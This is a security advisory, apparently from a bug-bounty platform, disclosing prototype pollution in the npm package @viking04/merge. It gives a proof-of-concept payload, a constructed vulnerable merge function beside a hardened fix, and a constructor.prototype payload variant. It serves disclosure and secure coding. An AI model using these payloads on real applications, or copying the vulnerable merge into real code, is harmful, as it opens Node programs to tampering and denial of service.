Prototype Pollution in viking04/merge

Valid

Reported on Sep 8th 2021


✍️ Description

The npm package @viking04/merge is vulnerable to Prototype Pollution: when a source object carrying a key named __proto__ is merged into a target, the merge writes that key's contents into Object.prototype, so every object in the process inherits the attacker-controlled properties (see the proof of concept below). More details on the vulnerability class: https://medium.com/node-modules/what-is-prototype-pollution-and-why-is-it-such-a-big-deal-2dd8d89a93c

🕵️‍♂️ Proof of Concept


var merge = require("@viking04/merge")
var a = {"a":{"red":"apple"}}
var b = {"b":{"yellow":"mango"}}
// JSON.parse creates an own property literally named "__proto__"; an object
// literal with that key would instead set the prototype of c itself
var c = JSON.parse('{"__proto__":{"polluted":true}}')
console.log("Before:"+{}.polluted)
// merging c copies its "__proto__" key onto the target, which resolves to Object.prototype
merge(a,b,c)
// a brand-new object now inherits polluted === true
console.log("After:"+{}.polluted)

Output

"Before:undefined"
"After:true"
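To show the shape of the bug and what a fix has to cover, the following is an added example and not code from @viking04/merge: a naive recursive merge (vulnerableMerge) that reproduces the report's __proto__ pollution and is also reachable through constructor.prototype, beside a hardened version (safeMerge) that skips __proto__, constructor and prototype, reads only a source's own keys and never descends into an inherited value on the target. The function names, payloads and probe keys are constructed for illustration; the constructor.prototype payload goes beyond the report's PoC to show why a filter on __proto__ alone, as asked about later in the thread, is not enough.

```javascript
// Added example, not code from @viking04/merge: a naive recursive merge in the
// shape that typically causes this class of bug, beside a hardened version.
// Function names, payloads and probe keys are constructed for illustration.

const isObjectLike = (v) => v !== null && (typeof v === "object" || typeof v === "function");

// Vulnerable: walks every enumerable key of each source and recurses into
// whatever the target already holds under that key. target["__proto__"] is
// Object.prototype, and target["constructor"]["prototype"] is Object.prototype
// too, so a crafted source writes into the prototype shared by every object.
function vulnerableMerge(target, ...sources) {
  for (const source of sources) {
    for (const key in source) {
      const value = source[key];
      if (isObjectLike(value)) {
        if (!isObjectLike(target[key])) target[key] = {};
        vulnerableMerge(target[key], value);
      } else {
        target[key] = value;
      }
    }
  }
  return target;
}

const UNSAFE_KEYS = new Set(["__proto__", "constructor", "prototype"]);
const hasOwn = (obj, key) => Object.prototype.hasOwnProperty.call(obj, key);

// Only recurse into plain objects (literals, JSON.parse output, Object.create(null)),
// never into functions, class instances or the prototype objects reached via them.
function isPlainObject(v) {
  if (v === null || typeof v !== "object") return false;
  const proto = Object.getPrototypeOf(v);
  return proto === Object.prototype || proto === null;
}

// Hardened: skip the keys that can reach a prototype, read only the source's own
// keys, and never descend into an inherited value on the target. Dropping the
// three keys silently is a conservative choice; a stricter merge might throw.
function safeMerge(target, ...sources) {
  for (const source of sources) {
    if (!isPlainObject(source)) continue;
    for (const key of Object.keys(source)) {
      if (UNSAFE_KEYS.has(key)) continue;
      const value = source[key];
      if (isPlainObject(value)) {
        if (!hasOwn(target, key) || !isPlainObject(target[key])) target[key] = {};
        safeMerge(target[key], value);
      } else {
        target[key] = value;
      }
    }
  }
  return target;
}

// Constructed payloads: the report's __proto__ payload and the constructor.prototype
// variant that a filter on __proto__ alone would miss.
const PAYLOAD_PROTO = '{"__proto__":{"polluted":true}}';
const PAYLOAD_CTOR = '{"constructor":{"prototype":{"pollutedViaCtor":true}}}';

// Merge a payload into a fresh target, then probe a brand-new object to see whether
// the shared prototype changed. Cleans up so successive runs do not interfere.
function pollutes(mergeFn, payloadJson, probeKey) {
  mergeFn({ a: { red: "apple" } }, JSON.parse(payloadJson));
  const hit = ({})[probeKey] === true;
  delete Object.prototype[probeKey];
  return hit;
}

function runDemo() {
  return {
    vulnerableViaProto: pollutes(vulnerableMerge, PAYLOAD_PROTO, "polluted"),
    vulnerableViaConstructor: pollutes(vulnerableMerge, PAYLOAD_CTOR, "pollutedViaCtor"),
    safeViaProto: pollutes(safeMerge, PAYLOAD_PROTO, "polluted"),
    safeViaConstructor: pollutes(safeMerge, PAYLOAD_CTOR, "pollutedViaCtor"),
  };
}

console.log(runDemo());
// { vulnerableViaProto: true, vulnerableViaConstructor: true,
//   safeViaProto: false, safeViaConstructor: false }
```

The key filter is necessary but is not the whole fix: the own-key iteration and the plain-object checks are what stop the recursion from ever landing on Object.prototype through an inherited target value. Freezing Object.prototype or using Object.create(null) for untrusted-input containers remains a worthwhile defence in depth for code that has to consume output from other merge libraries.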

💥 Impact

Depending on how the polluted properties are later consumed by the application, this may lead to denial of service, remote code execution, changed business logic, information disclosure or XSS.

Occurrences

We created a GitHub Issue asking the maintainers to create a SECURITY.md a year ago
viking04 (Maintainer), a year ago:

Good one. Didn't think of this case, will need to retest and fix it. Does filtering keys with __proto__ and constructor fix this completely?

viking04 validated this vulnerability a year ago
Jayateertha Guruprasad has been awarded the disclosure bounty
The fix bounty is now up for grabs
viking04 confirmed that a fix has been merged on baba40 a year ago
viking04 has been awarded the fix bounty
Jamie Slome (Admin), a year ago:

CVE published! 🎉
